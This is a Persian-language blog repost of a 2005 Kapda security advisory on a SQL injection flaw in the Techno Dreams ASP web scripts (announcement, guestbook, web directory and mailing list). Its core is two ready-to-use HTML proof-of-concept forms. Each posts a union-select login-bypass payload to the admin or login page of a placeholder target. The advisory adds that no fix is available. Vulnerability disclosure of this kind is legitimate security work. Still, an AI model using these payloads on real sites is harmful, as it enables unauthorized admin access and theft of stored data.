Terror Hellish -

Techno Dreams Scripts SQL injection

SQL injection

-------

حفره ي جديد در برنامه Techno Dreams توسط كانون پژوهشگران دانش امنيت (تيم امنيتي پرشين هكرز سابق) كشف شد.

تاریخ کشف:
31 مهر 1384

درباره برنامه:
Techno Dreams مجموعه برنامه هايي روي وب است كه شامل Announcement - Guestbook - Mailing List - WebDirectory مي باشد.
برای کسب اطلاعات بیشتر به سایت: Techno Dreams مراجعه کنید.

شرح :
----------------
آسيب پذيري موجود در اين مجموعه برنامه ها به نفوذ گر اين اجازه را مي دهد كه كدها خطرناكي را روي بانك اطلاعاتي اجرا كند در نتيجه مي تواند به اطلاعات پر اهميت دسترسي پيدا كند.

آسیب پذیری :
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/admin/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

راهکار امنیتی :
--------------------
هيچ راهكار امنيتي درحال حاضر موجود نيست.

اطلاعات بیشتر :
--------------------
http://www.securityfocus.com/archive/1/414708/30/0/threaded
http://www.securityfocus.com/bid/15215

+ نوشته شده در پنجشنبه پنجم آبان 1384ساعت 10:1 توسط |

Terror Hellish

Techno Dreams Scripts SQL injection

نوشته های پیشین